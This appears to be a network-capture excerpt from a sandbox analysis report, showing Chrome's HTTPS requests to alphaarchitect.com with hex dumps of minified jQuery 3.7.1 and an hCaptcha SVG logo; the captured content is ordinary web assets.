                                                                                                                                                                                                                                                                        ETag: W/"67354354-15601"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147801
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9b2adc55e5f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC876INData Raw: 37 64 63 34 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                                                        Data Ascii: 7dc4/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 6e 5b 69 2e 63 61 6c 6c 28 65 29 5d 7c 7c 22 6f 62 6a 65 63 74 22 3a 74 79 70 65 6f 66 20 65 7d 76 61 72 20 74 3d 22 33 2e
                                                                                                                                                                                                                                                                        Data Ascii: ;if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b 2b 29 69 66 28 6e 75
                                                                                                                                                                                                                                                                        Data Ascii: push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(nu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74
                                                                                                                                                                                                                                                                        Data Ascii: unction(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];ret
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c
                                                                                                                                                                                                                                                                        Data Ascii: =W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 6f 65 5b 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64
                                                                                                                                                                                                                                                                        Data Ascii: harCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),ye.childNodes),oe[ye.childNodes.length].nod
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: h&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"in
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 43 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                        Data Ascii: {try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&C){var n=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70
                                                                                                                                                                                                                                                                        Data Ascii: length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":enabled",":disabled"),(t=T.createElement("inp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b 69 2b 2b 5d 29 74 3d 3d 3d 65 5b 69 5d 26 26 28 72 3d 6e 2e 70 75 73 68 28 69 29 29 3b 77 68 69 6c 65 28 72 2d 2d 29 68 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: bute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[i++])t===e[i]&&(r=n.push(i));while(r--)he.


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.449753141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC865OUTGET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/images/hcaptcha-div-logo.svg HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:49:37 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67585501-2162"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147801
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9b36a12427f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC886INData Raw: 32 31 36 32 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 34 22 20 68 65 69 67 68 74 3d 22 34 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 20 34 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 64 3d 22 4d 33 30 20 32 38 48 32 36 56 33 32 48 33 30 56 32 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 37 34 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 64 3d 22 4d 32 36 20 32 38 48 32 32 56 33 32 48 32 36 56 32 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 37 34 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22
                                                                                                                                                                                                                                                                        Data Ascii: 2162<svg xmlns="http://www.w3.org/2000/svg" width="44" height="46" viewBox="0 0 44 46" fill="none"> <path opacity="0.5" d="M30 28H26V32H30V28Z" fill="#0074BF"/> <path opacity="0.7" d="M26 28H22V32H26V28Z" fill="#0074BF"/> <path opacity="0.7"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 36 20 32 30 48 32 32 56 32 34 48 32 36 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 32 20 32 30 48 31 38 56 32 34 48 32 32 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 20 32 30 48 31 34 56 32 34 48 31 38 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 38 22 20 64 3d 22 4d 31 34 20 32 30 48 31 30 56 32 34 48 31 34 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d
                                                                                                                                                                                                                                                                        Data Ascii: " fill="#008FBF"/> <path d="M26 20H22V24H26V20Z" fill="#008FBF"/> <path d="M22 20H18V24H22V20Z" fill="#008FBF"/> <path d="M18 20H14V24H18V20Z" fill="#008FBF"/> <path opacity="0.8" d="M14 20H10V24H14V20Z" fill="#008FBF"/> <path opacity=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 32 48 32 36 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 32 20 38 48 31 38 56 31 32 48 32 32 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 20 38 48 31 34 56 31 32 48 31 38 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 38 22 20 64 3d 22 4d 31 34 20 38 48 31 30 56 31 32 48 31 34 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 64 3d 22 4d 31 30 20 38 48 36 56 31 32 48 31 30 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70
                                                                                                                                                                                                                                                                        Data Ascii: 2H26V8Z" fill="#00B9BF"/> <path d="M22 8H18V12H22V8Z" fill="#00B9BF"/> <path d="M18 8H14V12H18V8Z" fill="#00B9BF"/> <path opacity="0.8" d="M14 8H10V12H14V8Z" fill="#00B9BF"/> <path opacity="0.5" d="M10 8H6V12H10V8Z" fill="#00B9BF"/> <p
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 20 31 37 2e 30 38 38 36 4c 32 34 2e 39 31 30 37 20 31 39 2e 38 37 33 31 43 32 34 2e 38 33 39 31 20 31 39 2e 39 33 30 34 20 32 34 2e 37 33 31 38 20 31 39 2e 39 32 33 32 20 32 34 2e 36 36 37 33 20 31 39 2e 38 35 31 37 43 32 34 2e 36 36 37 33 20 31 39 2e 38 35 31 37 20 32 34 2e 36 36 37 33 20 31 39 2e 38 34 34 35 20 32 34 2e 36 36 30 32 20 31 39 2e 38 34 34 35 43 32 34 2e 35 36 20 31 39 2e 37 32 32 38 20 32 34 2e 35 34 35 36 20 31 39 2e 34 30 37 39 20 32 34 2e 36 39 36 20 31 39 2e 32 38 36 32 4c 33 30 2e 35 36 35 37 20 31 34 2e 33 30 34 43 33 31 2e 30 37 34 20 31 33 2e 38 34 35 39 20 33 31 2e 31 34 35 36 20 31 33 2e 31 38 30 32 20 33 30 2e 37 33 30 34 20 31 32 2e 37 32 39 32 43 33 30 2e 33 32 39 35 20 31 32 2e 32 38 35 34 20 32 39 2e 36 39 32 34 20 31 32 2e
                                                                                                                                                                                                                                                                        Data Ascii: 17.0886L24.9107 19.8731C24.8391 19.9304 24.7318 19.9232 24.6673 19.8517C24.6673 19.8517 24.6673 19.8445 24.6602 19.8445C24.56 19.7228 24.5456 19.4079 24.696 19.2862L30.5657 14.304C31.074 13.8459 31.1456 13.1802 30.7304 12.7292C30.3295 12.2854 29.6924 12.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 34 33 2e 37 38 38 32 20 39 2e 35 31 33 33 37 20 34 33 2e 37 38 38 32 43 37 2e 34 32 30 36 39 20 34 33 2e 37 38 38 32 20 35 2e 37 37 36 31 32 20 34 32 2e 33 32 32 38 20 35 2e 37 37 36 31 32 20 33 39 2e 38 39 34 31 43 35 2e 37 37 36 31 32 20 33 37 2e 34 35 36 34 20 37 2e 34 33 38 36 31 20 33 36 20 39 2e 35 30 38 38 39 20 33 36 43 31 30 2e 39 37 34 32 20 33 36 20 31 31 2e 37 36 37 34 20 33 36 2e 36 34 35 33 20 31 31 2e 39 35 35 36 20 33 36 2e 38 35 31 34 4c 31 31 2e 34 34 30 32 20 33 38 2e 33 31 36 37 43 31 31 2e 33 30 35 38 20 33 38 2e 31 32 38 35 20 31 30 2e 35 34 34 20 33 37 2e 35 32 38 31 20 39 2e 36 30 32 39 39 20 33 37 2e 35 32 38 31 43 38 2e 33 39 37 35 37 20 33 37 2e 35 32 38 31 20 37 2e 34 36 35 35 20 33 38 2e 33 37 39 35 20 37 2e 34 36 35 35 20 33
                                                                                                                                                                                                                                                                        Data Ascii: 43.7882 9.51337 43.7882C7.42069 43.7882 5.77612 42.3228 5.77612 39.8941C5.77612 37.4564 7.43861 36 9.50889 36C10.9742 36 11.7674 36.6453 11.9556 36.8514L11.4402 38.3167C11.3058 38.1285 10.544 37.5281 9.60299 37.5281C8.39757 37.5281 7.4655 38.3795 7.4655 3
                                                                                                                                                                                                                                                                        2024-12-20 12:44:43 UTC1369INData Raw: 39 2e 35 34 39 43 32 30 2e 34 32 34 39 20 33 39 2e 35 34 39 20 31 39 2e 39 34 30 39 20 34 30 2e 31 31 38 31 20 31 39 2e 39 34 30 39 20 34 30 2e 39 34 37 31 43 31 39 2e 39 34 30 39 20 34 31 2e 37 37 36 32 20 32 30 2e 34 32 34 39 20 34 32 2e 33 34 35 33 20 32 31 2e 31 32 38 34 20 34 32 2e 33 34 35 33 43 32 31 2e 38 34 30 39 20 34 32 2e 33 34 35 33 20 32 32 2e 33 32 34 39 20 34 31 2e 37 37 36 32 20 32 32 2e 33 32 34 39 20 34 30 2e 39 34 37 31 43 32 32 2e 33 32 34 39 20 34 30 2e 31 31 38 31 20 32 31 2e 38 34 30 39 20 33 39 2e 35 34 39 20 32 31 2e 31 32 38 34 20 33 39 2e 35 34 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 35 35 35 35 35 35 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 37 2e 38 33 32 31 20 33 39 2e 36 30 32 38 48 32
                                                                                                                                                                                                                                                                        Data Ascii: 9.549C20.4249 39.549 19.9409 40.1181 19.9409 40.9471C19.9409 41.7762 20.4249 42.3453 21.1284 42.3453C21.8409 42.3453 22.3249 41.7762 22.3249 40.9471C22.3249 40.1181 21.8409 39.549 21.1284 39.549Z" fill="#555555"/> <path d="M27.8321 39.6028H2
